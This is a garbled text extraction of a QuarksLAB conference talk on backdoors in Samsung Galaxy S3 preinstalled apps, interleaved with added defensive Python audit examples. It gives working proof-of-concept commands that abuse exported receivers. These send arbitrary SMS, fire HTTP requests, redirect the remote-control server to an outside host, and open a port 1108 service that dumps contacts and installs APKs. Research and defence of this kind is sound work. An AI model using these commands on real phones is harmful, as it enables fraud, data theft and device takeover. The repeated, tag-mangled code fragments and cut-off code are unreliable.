Android OEM's applications (in)security and backdoors ... - QuarksLAB
Android OEM's applications (in)security and backdoors without permission
André Moulu
amoulu@quarkslab.com
Android introduction | Android security model | Methodology | Toward a backdoor without permission | Post-exploitation
Plan
1 Context and objectives
2 Android introduction
3 Android security model
4 Methodology
5 Toward a backdoor without permission
6 Post-exploitation
7 Scope of the vulnerabilities
8 Conclusion
Context and objectives
Why Android?
Most used mobile OS
Security often questioned because of the amount of malware
Unofficial markets (warez)
Show how an application without any permission can take control of a smartphone
Context and objectives
Targeted user
Security-aware user
Doesn't use alternative markets
Checks permissions before installing an application
Targeted smartphone
Samsung Galaxy S3 (I9300)
50 million copies sold (March 2013)
Actually, the Samsung frontend on the I9300
Some of these applications may also be present on other models
Some vulnerabilities may impact other models (S2, S4, Note 1/2, ...)
The vulnerable applications can't be deleted without root access
Plan
2 Android introduction
Android system and the applications
Classical components of an Android application
The communication between components
The exposure of components
Android system and the applications
The Android system
Generalities and common knowledge
Mobile OS (smartphone/tablet), "open source"
Based on Linux
Developed in C and Java
A special virtual machine: DalvikVM
Dalvik bytecode (DEX/ODEX)
What is an Android application?
APK file (actually a ZIP file)
APK's most important files:
AndroidManifest.xml (configuration, permissions, components, ...)
classes.dex (executable bytecode)
Native libraries as .so files (JNI)
Each application has a unique name (package name) and is signed by its developer (certificate)
Classical components of an Android application
The applicative components
The communication between components
The Intent: source of communication in Android
The exposure of components
Can we talk to this component?
Exported or not, that's the question
By default, components are not exported
Special case: ContentProvider
The component status, exported or not, is defined by AndroidManifest.xml:
The attribute exported=[true|false]
Presence of an intent-filter (the component is automatically exported)
A component can be exported but protected by a permission
The exposure of components
Example of AndroidManifest.xml
[manifest listing not preserved in this extraction; only its line numbers survived]
Plan
3 Android security model
Applications isolation
The permission system
Applications isolation
One user per application
Security by isolation
Default behaviour:
Each application has a dedicated user (and therefore a UID) on the system
Special case:
An application can ask to share a UID with another application
sharedUserId mechanism (AndroidManifest.xml)
In order to share a UID, the two applications must be signed with the same certificate
Consequences:
Isolation between applications in memory (process)
Isolation on the filesystem
Doesn't protect against world-readable/writable files
The permission system
Application restrictions
Least privilege security
Permissions protect against dangerous actions:
SD card write access, INTERNET access, sending SMS, ...
By default, an application doesn't have any permission
You need to ask for them explicitly in AndroidManifest.xml
Requested permissions are shown to the user at installation
Boolean choice
A permission can protect:
Functions: AccountManager.getAccounts() (GET_ACCOUNTS)
Intents: android.intent.action.CALL (CALL_PHONE)
Components: content://contacts (READ_CONTACTS, ...)
A permission is given to a UID and not to a package name
The permission model is applied to native code too
All permissions of each application with the same sharedUserId are combined
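The two slides above (isolation by UID, sharedUserId only between apps signed with the same certificate, permissions granted to the UID and therefore combined across it) can be modelled in a few lines. The following is an added example written for this page, not code from the talk or from Android itself: the package names, certificate identifiers and permission sets are constructed, and the UID numbering only mimics Android's habit of starting application UIDs at 10000.

```python
"""Model of the slides' rules: one UID per application, sharedUserId only
between apps signed by the same certificate, permissions granted to the UID
(so every app sharing it gets the union). Added example; all package names,
certificate ids and permission sets below are constructed."""

FIRST_APP_UID = 10000  # Android assigns application UIDs from 10000 upwards


class InstallError(Exception):
    """Raised when a package would violate the sharedUserId signing rule."""


def assign_uids(apps):
    """apps: list of dicts with keys package, cert, permissions and an
    optional sharedUserId. Returns {package: uid}. Raises InstallError when
    a package asks for a shared UID already held by a different certificate."""
    shared = {}  # sharedUserId -> (uid, cert that first claimed it)
    uids = {}
    next_uid = FIRST_APP_UID
    for app in apps:
        sid = app.get("sharedUserId")
        if sid is None:
            # Default behaviour: a dedicated user per application.
            uids[app["package"]] = next_uid
            next_uid += 1
            continue
        if sid in shared:
            uid, cert = shared[sid]
            if cert != app["cert"]:
                raise InstallError("%s: certificate mismatch for sharedUserId %s"
                                   % (app["package"], sid))
        else:
            uid, cert = next_uid, app["cert"]
            shared[sid] = (uid, cert)
            next_uid += 1
        uids[app["package"]] = uid
    return uids


def effective_permissions(apps):
    """Permissions each package can really use: the union over its UID,
    because the kernel and the framework check the UID, not the package."""
    uids = assign_uids(apps)
    by_uid = {}
    for app in apps:
        by_uid.setdefault(uids[app["package"]], set()).update(app["permissions"])
    return {app["package"]: by_uid[uids[app["package"]]] for app in apps}


def can_install(apps, newcomer):
    """True if newcomer would be accepted next to the already installed apps."""
    try:
        assign_uids(apps + [newcomer])
        return True
    except InstallError:
        return False


# Constructed sample: two platform-signed apps sharing the system UID, one
# of them declaring no permission of its own, and an unrelated third app.
SAMPLE_APPS = [
    {"package": "com.example.settings", "cert": "platform-cert",
     "sharedUserId": "android.uid.system",
     "permissions": {"android.permission.INSTALL_PACKAGES",
                     "android.permission.WRITE_SECURE_SETTINGS"}},
    {"package": "com.example.mtp", "cert": "platform-cert",
     "sharedUserId": "android.uid.system", "permissions": set()},
    {"package": "com.example.game", "cert": "indie-cert",
     "permissions": {"android.permission.INTERNET"}},
]

if __name__ == "__main__":
    for pkg, perms in effective_permissions(SAMPLE_APPS).items():
        print(pkg, sorted(perms))
    rogue = {"package": "com.example.rogue", "cert": "other-cert",
             "sharedUserId": "android.uid.system", "permissions": set()}
    print("rogue accepted:", can_install(SAMPLE_APPS, rogue))
```

The point to notice is com.example.mtp: it declares nothing, yet every permission of the UID it shares is available to it, which is exactly why a bug in a small sharedUserId system app matters as much as a bug in the big one.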
The permission system
Application restrictions
Consequences of the permission model
Components can be protected
The user "knows" what the application can do when it is installed, and thus the associated risks
Limits the impact in case of a vulnerable application
Plan
4 Methodology
A huge attack surface
Vulnerability research
A huge attack surface
The attack surface
Important folders
We want to build a backdoor targeting an Android smartphone
Userland vulnerabilities (easy to find, easy to exploit)
Folders customized by manufacturers on an Android smartphone:
/system/app
/system/framework
/system/bin
/system/lib
The content of these folders may change between operators
A huge attack surface
A huge attack surface
A large number of applications
Only two folders examined, but a significant attack surface
216 APKs in /system/app
For comparison: 91 APKs on the Nexus 4
Vulnerability research
Automation
Constraints
Many applications; automation is needed to find the interesting ones
Then audit by hand (reverse engineering)
Exploitation of vulnerabilities with few or no permissions at all
Creation of some scripts: ASA
Based on Androguard (great framework)
ASAManifest: analyzes the manifest of an application and tells which components are exported and under what conditions
ASADatabase: analyzes a large number of applications like ASAManifest does and checks for sensitive API usage. The results are stored in a MongoDB database.
ASADiff (ongoing): diff between two versions of a system, for example to detect vulnerability patching.
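The export rules listed under "The exposure of components" are exactly what an ASAManifest-style check has to encode. Below is an added example of such a check written for this page with only the standard library, not the ASA scripts themselves and not Androguard (which would be used to get the decoded manifest out of an APK in the first place). The manifest is constructed, with placeholder package and component names; the one rule taken from outside the slides is that a ContentProvider is exported by default only when targetSdkVersion is below 17.

```python
"""Decide which components of a decoded AndroidManifest.xml other apps can
reach, using the slides' rules: explicit exported attribute, intent-filter
implies exported, optional protecting permission, ContentProvider special
case. Added example, not ASA/Androguard code. The manifest is constructed
and its names are placeholders."""
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
COMPONENT_TAGS = ("activity", "service", "receiver", "provider")

SAMPLE_MANIFEST = """<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.oemapp" android:sharedUserId="android.uid.system">
  <uses-sdk android:minSdkVersion="8" android:targetSdkVersion="16"/>
  <application>
    <activity android:name=".MainActivity">
      <intent-filter><action android:name="android.intent.action.MAIN"/></intent-filter>
    </activity>
    <receiver android:name=".BackgroundSender">
      <intent-filter><action android:name="com.example.QUICKSEND"/></intent-filter>
    </receiver>
    <receiver android:name=".ProtectedReceiver" android:exported="true"
              android:permission="com.example.permission.PRIVATE">
      <intent-filter><action android:name="com.example.PROTECTED"/></intent-filter>
    </receiver>
    <service android:name=".InternalService"/>
    <provider android:name=".DataProvider" android:authorities="com.example.data"/>
    <provider android:name=".ClosedProvider" android:authorities="com.example.closed"
              android:exported="false"/>
  </application>
</manifest>
"""


def _attr(elem, name):
    """Read an attribute from the android: namespace."""
    return elem.get("{%s}%s" % (ANDROID_NS, name))


def is_exported(elem, target_sdk):
    """Apply Android's default-export rules to one component element."""
    explicit = _attr(elem, "exported")
    if explicit is not None:
        return explicit.lower() == "true"
    if elem.tag == "provider":
        # Providers were exported by default until targetSdkVersion 17.
        return target_sdk < 17
    # Any intent-filter makes an activity/service/receiver exported by default.
    return elem.find("intent-filter") is not None


def analyze_manifest(xml_text):
    """One dict per component: export status, protecting permission, actions."""
    root = ET.fromstring(xml_text)
    uses_sdk = root.find("uses-sdk")
    target_sdk = 1  # Android's default when <uses-sdk> is absent
    if uses_sdk is not None:
        target_sdk = int(_attr(uses_sdk, "targetSdkVersion")
                         or _attr(uses_sdk, "minSdkVersion") or 1)
    results = []
    for tag in COMPONENT_TAGS:
        for comp in root.iter(tag):
            exported = is_exported(comp, target_sdk)
            # Note: providers can also be gated by readPermission/writePermission,
            # which this simplified check does not model.
            perm = _attr(comp, "permission")
            results.append({
                "type": tag,
                "name": _attr(comp, "name"),
                "exported": exported,
                "permission": perm,
                "actions": [_attr(a, "name") for a in comp.iter("action")],
                # Reachable by any app: exported and not behind a permission.
                "open": exported and perm is None,
            })
    return results


def open_components(xml_text):
    """Names of the components any third-party app can talk to."""
    return [c["name"] for c in analyze_manifest(xml_text) if c["open"]]


if __name__ == "__main__":
    for c in analyze_manifest(SAMPLE_MANIFEST):
        status = "OPEN" if c["open"] else ("exported, permission-protected" if c["exported"] else "private")
        print("%-8s %-20s %-30s %s" % (c["type"], c["name"], status, ",".join(c["actions"])))
```

Run on the sample, the check flags .BackgroundSender (a receiver exported only because of its intent-filter) and .DataProvider (exported by the pre-17 provider default), while .ProtectedReceiver is exported but gated by a permission and .InternalService is private. The launcher activity is reported as open too, which is expected for a MAIN activity; the finding worth triage is an open receiver or provider whose action does something sensitive.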
Vulnerability research
ASAManifest
Vulnerability research
ASADatabase: examples of queries on MongoDB
Applications with the INSTALL_PACKAGES permission
> db.gs3.find({permission:/INSTALL_PACKAGES/},{filename:1,_id:0})
{ "filename" : "DttSupport.apk" }
{ "filename" : "Kies.apk" }
{ "filename" : "MtpApplication.apk" }
{ "filename" : "PackageInstaller.apk" }
[...]
Number of sharedUserId system applications
> db.gs3.find({"manifest.sharedUserId":"android.uid.system"},{}).count()
41
Which ones really use INSTALL_PACKAGES?
> db.gs3.find({permission:/INSTALL_PACKAGES/},{filename:1,_id:0}).count()
11
> db.gs3.find({permission:/INSTALL_PACKAGES/,use_installPackage:true},{filename:1,_id:0}).count()
10
> db.gs3.find({permission:/INSTALL_PACKAGES/,use_installPackage:false},{filename:1,_id:0})
{ "filename" : "MtpApplication.apk" }
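The three questions on the slide (who declares INSTALL_PACKAGES, how many apps share the system UID, who holds INSTALL_PACKAGES without ever calling installPackage) can be run without a MongoDB instance. The following added example, written for this page and not part of ASA, answers them over an in-memory list of documents with a minimal find() that supports the two Mongo features the slide's queries use: regex matching against a list field and dotted paths into sub-documents. The four filenames quoted on the slide are reused; every other field, and the extra entry, is constructed.

```python
"""Offline stand-in for the ASADatabase queries on the slide. Added example,
not ASA code: the four filenames from the slide are reused, all other fields
and the extra document are constructed."""
import re

GS3_DOCS = [
    {"filename": "DttSupport.apk",
     "permission": ["android.permission.INSTALL_PACKAGES", "android.permission.INTERNET"],
     "manifest": {"sharedUserId": "android.uid.system"}, "use_installPackage": True},
    {"filename": "Kies.apk",
     "permission": ["android.permission.INSTALL_PACKAGES"],
     "manifest": {"sharedUserId": "android.uid.system"}, "use_installPackage": True},
    {"filename": "MtpApplication.apk",
     "permission": ["android.permission.INSTALL_PACKAGES"],
     "manifest": {"sharedUserId": "android.uid.system"}, "use_installPackage": False},
    {"filename": "PackageInstaller.apk",
     "permission": ["android.permission.INSTALL_PACKAGES"],
     "manifest": {}, "use_installPackage": True},
    {"filename": "Calculator.apk",  # constructed: no permission, own UID
     "permission": [], "manifest": {}, "use_installPackage": False},
]

INSTALL_PACKAGES = re.compile("INSTALL_PACKAGES")


def _get(doc, path):
    """Resolve a dotted path such as manifest.sharedUserId; None if absent."""
    for key in path.split("."):
        if not isinstance(doc, dict) or key not in doc:
            return None
        doc = doc[key]
    return doc


def _matches(value, wanted):
    """Mongo-like match: a regex matches any element of a list field,
    anything else is compared for equality."""
    if isinstance(wanted, re.Pattern):
        values = value if isinstance(value, list) else [value]
        return any(isinstance(v, str) and wanted.search(v) for v in values)
    return value == wanted


def find(docs, criteria):
    """Subset of db.collection.find(): all criteria must match."""
    return [d for d in docs if all(_matches(_get(d, k), v) for k, v in criteria.items())]


def count(docs, criteria):
    return len(find(docs, criteria))


def filenames(docs, criteria):
    """Equivalent of the {filename:1,_id:0} projection on the slide."""
    return [d["filename"] for d in find(docs, criteria)]


def unused_install_packages(docs):
    """Apps holding INSTALL_PACKAGES with no call to installPackage: dead
    privilege that only widens the impact of a bug in that app."""
    return filenames(docs, {"permission": INSTALL_PACKAGES, "use_installPackage": False})


if __name__ == "__main__":
    print(filenames(GS3_DOCS, {"permission": INSTALL_PACKAGES}))
    print(count(GS3_DOCS, {"manifest.sharedUserId": "android.uid.system"}))
    print(count(GS3_DOCS, {"permission": INSTALL_PACKAGES, "use_installPackage": True}))
    print(unused_install_packages(GS3_DOCS))
```

The last query is the one a defender cares about: a permission that is declared but never exercised cannot be justified by functionality, so it should be removed from the manifest, which is cheaper than auditing every code path that might be reachable from an exported component.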
Plan
5 Toward a backdoor without permission
Backdoor's features
SD Card: Android and backward compatibility...
SMS/MMS sending and file exfiltration
Arbitrary HTTP request execution
Getting C.R.U.D. rights on SMS/Contacts/Memo and more
Sync for fun and profit
I don't need root when I have system
Backdoor's features
Objectives
SD Card: Android and backward compatibility...
SD Card: a protected storage?
Once upon a time... Android
First versions: total access to the SD card
Read & write access
Current state
Write access: WRITE_EXTERNAL_STORAGE
Read access: currently "tolerated" without permission
Dangerous for user privacy (INTERNET + SD card)
Introduction of the READ_EXTERNAL_STORAGE permission
"Protect the SD card" in system settings (JB)
And what about backward compatibility?
From the Android documentation, if minSdkVersion and targetSdkVersion
SD Card: Android and backward compatibility...
Objectives
SMS/MMS sending and file exfiltration
Vuln1 - SecMms.apk
Malware and premium SMS
Current Android malware asks for the SEND_SMS permission
Easily detectable and suspicious for a user
What about malware which can send premium SMS without asking for permission?
There is an app for that
SecMms.apk
Exported BroadcastReceiver -> ui.MmsBGSender
A well-formed Intent allows sending arbitrary SMS/MMS
PoC (attachments can also be added)
shell@android:/ $ am broadcast -a com.android.mms.QUICKSND --es mms_to "*PHONENUMBER*" --es mms_subject "*SUBJECT*" --es mms_text "*MESSAGE*"
SMS/MMS sending and file exfiltration
Objectives
Arbitrary HTTP request execution
Vuln2 - PCWClientS.apk
PCWReceiver
When an Intent is received with com.sec.pcw.device.HTTP_REQUEST_RETRY as action
The body, uri and pushType attributes are extracted and an HTTP POST request is executed based on them
PoC
shell@android:/ $ am broadcast -a com.sec.pcw.device.HTTP_REQUEST_RETRY --es uri *URL* --es body *POST_DATA* --es pushType *PUSHTYPE*
Arbitrary HTTP request execution
Objectives
Getting C.R.U.D. rights on SMS/Contacts/Memo and more
Vuln3 - wssyncmlnps.apk
Typical problems with a manufacturer frontend
This vulnerability was patched by Samsung before we reported it
Patched on the S3 but not on the S2, Tab 1, Note 1
Special case: the INTERNET permission is needed
Creation of a socket
smlNpsReceiver
The application exports a BroadcastReceiver smlNpsReceiver
Responds to Intents related to Kies:
com.intent.action.KIES_WSSERVICE_START
com.intent.action.KIES_WSSERVICE_START_WIFI
Getting C.R.U.D. rights on SMS/Contacts/Memo and more
Vuln3 - wssyncmlnps.apk
smlNpsReceiver
public void onReceive(Context paramContext, Intent paramIntent)
{
    [...]
    if(paramIntent.getAction().equals("com.intent.action.KIES_WSSERVICE_START"))
    {
        smlDebug.SML_DEBUG(2, "KIES_WSSERVICE_START");
        wifi_connected = false;
        usb_connected = true;
        paramContext.stopService(new Intent(paramContext, smlNpsService.class));
        paramContext.startService(new Intent(paramContext, smlNpsService.class));
    }
    [...]
}
Getting C.R.U.D. rights on SMS/Contacts/Memo and more
Vuln3 - wssyncmlnps.apk
smlNpsService
When it starts, it runs NpsServiceTask in a thread
Listens on 0.0.0.0:1108 (TCP)
Each connection is handled by smlNpsHandler in a separate thread
The method work() is called to handle the received data
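A service that binds 0.0.0.0 is visible in /proc/net/tcp, which is readable from an adb shell on the device (`adb shell cat /proc/net/tcp`). The following added example, written for this page and not part of the talk, parses that file's format and lists the sockets in LISTEN state bound to every interface, the condition under which a service like smlNpsService becomes reachable from the network. The three /proc lines are constructed; port 0x0454 is 1108 and uid 1000 is the system UID that android.uid.system apps run under. IPv6 listeners live in /proc/net/tcp6 and are not handled here.

```python
"""List TCP sockets listening on all interfaces from the text of
/proc/net/tcp. Added example, not from the slides; the sample lines below
are constructed (0x0454 = 1108, 0x13AD = 5037, 0x01BB = 443)."""

TCP_LISTEN = "0A"  # hex state value of TCP_LISTEN in /proc/net/tcp

SAMPLE_PROC_NET_TCP = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 00000000:0454 00000000:0000 0A 00000000:00000000 00:00000000 00000000  1000        0 12345 1 00000000 100 0 0 10 -1
   1: 0100007F:13AD 00000000:0000 0A 00000000:00000000 00:00000000 00000000 10042        0 12346 1 00000000 100 0 0 10 -1
   2: 0F02000A:C1A8 5BD0D63A:01BB 01 00000000:00000000 00:00000000 00000000 10087        0 12347 1 00000000 20 4 30 10 -1
"""


def decode_addr(hexaddr):
    """'0100007F:13AD' -> ('127.0.0.1', 5037). The IPv4 address is stored
    as a little-endian 32-bit value, so the octets are read back to front."""
    ip_hex, port_hex = hexaddr.split(":")
    octets = [int(ip_hex[i:i + 2], 16) for i in (6, 4, 2, 0)]
    return ".".join(str(o) for o in octets), int(port_hex, 16)


def parse_proc_net_tcp(text):
    """One dict per socket row: local ip/port, state and owning uid."""
    sockets = []
    for line in text.splitlines()[1:]:  # first row is the column header
        fields = line.split()
        if len(fields) < 8:
            continue
        ip, port = decode_addr(fields[1])
        sockets.append({"ip": ip, "port": port, "state": fields[3], "uid": int(fields[7])})
    return sockets


def wildcard_listeners(text):
    """Sockets in LISTEN state bound to 0.0.0.0, i.e. reachable through any
    interface the device has, not just loopback."""
    return [s for s in parse_proc_net_tcp(text)
            if s["state"] == TCP_LISTEN and s["ip"] == "0.0.0.0"]


if __name__ == "__main__":
    for s in wildcard_listeners(SAMPLE_PROC_NET_TCP):
        print("LISTEN 0.0.0.0:%d owned by uid %d" % (s["port"], s["uid"]))
```

A listener owned by uid 1000 (system) on a non-loopback address is the combination to look at first: whatever protocol it speaks is exposed with the privileges of every sharedUserId system app at once. Binding such a service to 127.0.0.1, or gating the receiver that starts it behind a signature permission, removes the exposure without changing the protocol.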
Getting C.R.U.D. rights on SMS/Contacts/Memo and more
Vuln3 - wssyncmlnps.apk
smlNpsHandler.work()
protected void work()
{
    if(this.socket != null)
    {
        socketIS = this.socket.getInputStream();
        socketOS = this.socket.getOutputStream();
        cmdLine = this.readLine(socketIS);
        if((cmdLine != null) && (cmdLine.length() != 0))
        {
            cmdInformation = new String[3];
            v5 = cmdLine.indexOf("BEGIN");
            cmdInformation[0] = cmdLine.substring(0, 3);
            if(v5
4 {<br />
5 socketIS = this.socket.getInputStream();<br />
6 socketOS = this.socket.getOutputStream();<br />
7 cmdL<strong>in</strong>e = this.readL<strong>in</strong>e(socketIS);<br />
8 if((cmdL<strong>in</strong>e != 0) && (cmdL<strong>in</strong>e.length() != 0))<br />
9 {<br />
10 cmdInformation = new Str<strong>in</strong>g[3];<br />
11 v5 = cmdL<strong>in</strong>e.<strong>in</strong>dexOf("BEGIN");<br />
12 cmdInformation[0] = cmdL<strong>in</strong>e.substr<strong>in</strong>g(0, 3);<br />
13 if(v5
<strong>Android</strong> <strong>in</strong>troduction <strong>Android</strong> <strong>security</strong> model Methodology Toward a backdoor without permission Post-exploitation<br />
Gett<strong>in</strong>g C.R.U.D rights on SMS/Contacts/Memo <strong>and</strong> more<br />
Vuln3 - wssyncmlnps.apk<br />
smlNpsH<strong>and</strong>ler.work()<br />
1 protected void work()<br />
2 {<br />
3 if(this.socket != 0)<br />
4 {<br />
5 socketIS = this.socket.getInputStream();<br />
6 socketOS = this.socket.getOutputStream();<br />
7 cmdL<strong>in</strong>e = this.readL<strong>in</strong>e(socketIS);<br />
8 if((cmdL<strong>in</strong>e != 0) && (cmdL<strong>in</strong>e.length() != 0))<br />
9 {<br />
10 cmdInformation = new Str<strong>in</strong>g[3];<br />
11 v5 = cmdL<strong>in</strong>e.<strong>in</strong>dexOf("BEGIN");<br />
12 cmdInformation[0] = cmdL<strong>in</strong>e.substr<strong>in</strong>g(0, 3);<br />
13 if(v5
<strong>Android</strong> <strong>in</strong>troduction <strong>Android</strong> <strong>security</strong> model Methodology Toward a backdoor without permission Post-exploitation<br />
Gett<strong>in</strong>g C.R.U.D rights on SMS/Contacts/Memo <strong>and</strong> more<br />
Vuln3 - wssyncmlnps.apk<br />
smlNpsH<strong>and</strong>ler.work()<br />
1 protected void work()<br />
2 {<br />
3 if(this.socket != 0)<br />
4 {<br />
5 socketIS = this.socket.getInputStream();<br />
6 socketOS = this.socket.getOutputStream();<br />
7 cmdL<strong>in</strong>e = this.readL<strong>in</strong>e(socketIS);<br />
8 if((cmdL<strong>in</strong>e != 0) && (cmdL<strong>in</strong>e.length() != 0))<br />
9 {<br />
10 cmdInformation = new Str<strong>in</strong>g[3];<br />
11 v5 = cmdL<strong>in</strong>e.<strong>in</strong>dexOf("BEGIN");<br />
12 cmdInformation[0] = cmdL<strong>in</strong>e.substr<strong>in</strong>g(0, 3);<br />
13 if(v5
Vuln3 - wssyncmlnps.apk
smlNpsHandler.work()
case 70:
    v1 = this.GetContact(cmdInformation[1]);
    v2 = 0;
    break;
[...]
case 72:
    v1 = this.GetContactsIndexArray(
        com.wssnps.database.smlContactItem$StorageType.SMLDS_PIM_ADAPTER_CONTACT_PHONE.getId());
    v2 = 0;
    break;
[...]
case 90:
    v1 = this.GetCalendar(cmdInformation[1]);
    v2 = 0;
    break;
[...]
Vuln3 - wssyncmlnps.apk
smlNpsHandler.work()
case 453:
    v1 = Integer.valueOf(cmdInformation[1].trim()).intValue();
    if(v1 [...]
Vuln3 - wssyncmlnps.apk
PoC
$ adb shell am broadcast -a com.intent.action.KIES_WSSERVICE_START
Broadcasting: Intent { act=com.intent.action.KIES_WSSERVICE_START }
Broadcast completed: result=0
$ adb shell netstat |grep 1108
tcp6 0 0 :::1108 :::* LISTEN
$ adb forward tcp:1108 tcp:1108
$ nc localhost 1108 -v
Connection to localhost 1108 port [tcp/*] succeeded!
090 1 # getCalendar(1)
0
BEGIN:VCALENDAR
VERSION:1.0
BEGIN:VEVENT
SUMMARY;CHARSET=UTF-8;ENCODING=QUOTED-PRINTABLE:Sstic 2013
DESCRIPTION;CHARSET=UTF-8;ENCODING=QUOTED-PRINTABLE:Conf
LOCATION;CHARSET=UTF-8;ENCODING=QUOTED-PRINTABLE:Rennes
DTSTART:20130605T170000Z
DTEND:20130607T180000Z
X-ALLDAY:UNSET
X-CALENDARGROUP:1
UID:000000000000000000000000000000000000000000000001
END:VEVENT
END:VCALENDAR
Vuln3 - wssyncmlnps.apk
PoC
072 # get the id of contacts on the smartphone (not the SIM)
0
2 # number of contacts
8,9, # id of the contacts
070 9 # getContact(9)
0
BEGIN:VCARD
VERSION:2.1
N;CHARSET=UTF-8;ENCODING=QUOTED-PRINTABLE:;Kevin;;;;;;;
TEL;HOME;CELL:06 06 06 06 06
EMAIL;HOME;CHARSET=UTF-8;ENCODING=QUOTED-PRINTABLE:kevin@hotmail.com
X-DIRTY:1
X-ACCOUNT:vnd.sec.contact.phone;vnd.sec.contact.phone
END:VCARD
453 32 # install APK from /sdcard/restore/
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Some available features...
C.R.U.D on the SMS/MMS/contacts/memos/calendar/call log/...
Backup of mail accounts
Installation of arbitrary application
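As an added example (not code from the talk or from wssyncmlnps.apk), here is a small Python triage helper for requests captured on the port 1108 service, the kind of thing an incident responder runs over a tcpdump of a phone that unexpectedly shows this listener. It mirrors the parsing visible in smlNpsHandler.work() above (first three characters as the numeric command code, the remainder as the argument, "BEGIN" marking an inline vCard/vCalendar body) and labels each request with the handler the decompiled switch reaches for that code. The code table, the high-risk set and the sample request lines come from the slides; the function names, the NpsRequest record and the alert format are this example's own.

```python
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Command codes and the handler they reach, as shown in the decompiled
# switch of smlNpsHandler.work(). Codes not listed there are reported as
# "unknown" rather than guessed.
KNOWN_COMMANDS = {
    70: "GetContact",
    72: "GetContactsIndexArray",
    90: "GetCalendar",
    453: "install APK from /sdcard/restore/",
}

# Requests that change the device rather than read from it.
HIGH_RISK_CODES = {453}


@dataclass
class NpsRequest:
    code: int
    argument: Optional[str]
    operation: str
    payload_type: Optional[str]  # "VCARD"/"VCALENDAR" when the line carries a BEGIN: body
    high_risk: bool


def parse_request_line(line: str) -> Optional[NpsRequest]:
    """Parse one request line the way work() does; None if it is not a request."""
    line = line.rstrip("\r\n")
    # work() takes cmdLine.substring(0, 3) as the command code.
    if len(line) < 3 or not line[:3].isdigit():
        return None
    code = int(line[:3])
    # ...and uses cmdLine.indexOf("BEGIN") to spot an inline vCard/vCalendar.
    begin_at = line.find("BEGIN")
    if begin_at == -1:
        argument, payload_type = line[3:].strip(), None
    else:
        argument = line[3:begin_at].strip()
        tokens = line[begin_at + len("BEGIN"):].lstrip(":").split()
        payload_type = tokens[0] if tokens else "unknown"
    return NpsRequest(
        code=code,
        argument=argument or None,
        operation=KNOWN_COMMANDS.get(code, "unknown"),
        payload_type=payload_type,
        high_risk=code in HIGH_RISK_CODES,
    )


def triage_capture(lines: List[str]) -> Tuple[List[NpsRequest], List[str]]:
    """Classify every request in a capture and collect the ones worth an alert."""
    requests, alerts = [], []
    for raw in lines:
        req = parse_request_line(raw)
        if req is None:
            continue  # responses ("0", counts, vCard bodies) are not requests
        requests.append(req)
        if req.high_risk:
            alerts.append("code %d: %s (argument=%s)" % (req.code, req.operation, req.argument))
        elif req.operation == "unknown":
            alerts.append("code %d: unknown command" % req.code)
    return requests, alerts


# Constructed sample: the request lines typed in the PoC above (without the
# trailing "# ..." comments), plus one code that does not appear on the slides.
SAMPLE_CAPTURE = [
    "090 1",
    "072",
    "070 9",
    "453 32",
    "999 x",
]

if __name__ == "__main__":
    reqs, found = triage_capture(SAMPLE_CAPTURE)
    for r in reqs:
        print(r)
    print("alerts:", found)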
Vuln3 - wssyncmlnps.apk
How was it patched?
A permission was added on the component for the action KIES_WSSERVICE_START
android.permission.COM_WSSNPS has a protectionLevel of signatureOrSystem
Objectives
Sync for fun and profit
Vuln4 - Sync and remote control applications...
FmmDM, FmmDS, ...
There are applications to do data sync and remote control of the smartphone
"Security" => "Remote controls"
The user can remote control his phone via http://samsungdive.com/
Vuln4 - sync and remote control applications...
Vulnerabilities
These applications export a BroadcastReceiver
With the correct Intent, you can change the default server used for sync and remote control by the smartphone
PoC for FmmDM
shell@android:/ $ am broadcast -a android.intent.action.dsm.UPDATE_URL
--es DMServer "http://sh4ka.fr:80/test/trololo.php"
I don't need root when I have system
Vuln5 - serviceModeApp.apk
ASADatabase to the rescue
Search in the database for applications with:
sharedUserId = system
Usage of API for command execution/dynamic code loading
Among these applications: serviceModeApp.apk
A strange AndroidManifest.xml file
[...]
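The manifest search described above (system sharedUserId plus components anyone can reach) is something a reviewer can automate over a set of decoded manifests. The Python audit below is an added example, not tooling from the talk or from serviceModeApp.apk: it flags applications that run as the system user, exported receivers/services/activities that carry no android:permission (the pattern behind Vuln3, Vuln4 and Vuln5), and exported components guarded by a permission whose protectionLevel is only normal or dangerous, which is why the Vuln3 fix used signatureOrSystem. It expects the text manifest that apktool or aapt produces. The sample manifest is constructed for the demo; its package and component names are invented and are not the real serviceModeApp.apk manifest, which is not reproduced on the slides.

```python
import xml.etree.ElementTree as ET
from typing import List, Tuple

ANDROID_NS = "http://schemas.android.com/apk/res/android"

# protectionLevel as apktool decodes it, plus the raw numeric form aapt prints.
PROTECTION_LEVELS = {"0x0": "normal", "0x1": "dangerous",
                     "0x2": "signature", "0x3": "signatureOrSystem"}
STRONG_LEVELS = {"signature", "signatureOrSystem"}


def _attr(elem, name):
    """Read an android:* attribute from an element."""
    return elem.get("{%s}%s" % (ANDROID_NS, name))


def _is_exported(comp) -> bool:
    # Receivers, services and activities are exported when they declare an
    # intent-filter, unless android:exported="false" says otherwise.
    exported = _attr(comp, "exported")
    if exported is not None:
        return exported == "true"
    return comp.find("intent-filter") is not None


def audit_manifest(xml_text: str) -> List[Tuple[str, str, str]]:
    """Return (severity, component, message) findings for a decoded manifest."""
    root = ET.fromstring(xml_text)
    findings = []
    if _attr(root, "sharedUserId") == "android.uid.system":
        findings.append(("HIGH", "manifest",
                         "runs as the system user (sharedUserId=android.uid.system)"))
    # Permissions the app declares itself, with their protection level.
    declared = {}
    for perm in root.iter("permission"):
        level = _attr(perm, "protectionLevel") or "normal"
        declared[_attr(perm, "name")] = PROTECTION_LEVELS.get(level, level)
    app = root.find("application")
    for comp in (app if app is not None else []):
        # content providers follow a different default rule and are left out here
        if comp.tag not in ("receiver", "service", "activity") or not _is_exported(comp):
            continue
        name = _attr(comp, "name")
        actions = [_attr(a, "name") for f in comp.findall("intent-filter")
                   for a in f.findall("action")]
        perm = _attr(comp, "permission")
        if perm is None:
            findings.append(("HIGH", name, "exported %s with no android:permission; actions=%s"
                             % (comp.tag, actions)))
            continue
        level = declared.get(perm, "declared elsewhere")
        severity = "INFO" if level in STRONG_LEVELS else "MEDIUM"
        findings.append((severity, name, "exported %s guarded by %s (protectionLevel %s)"
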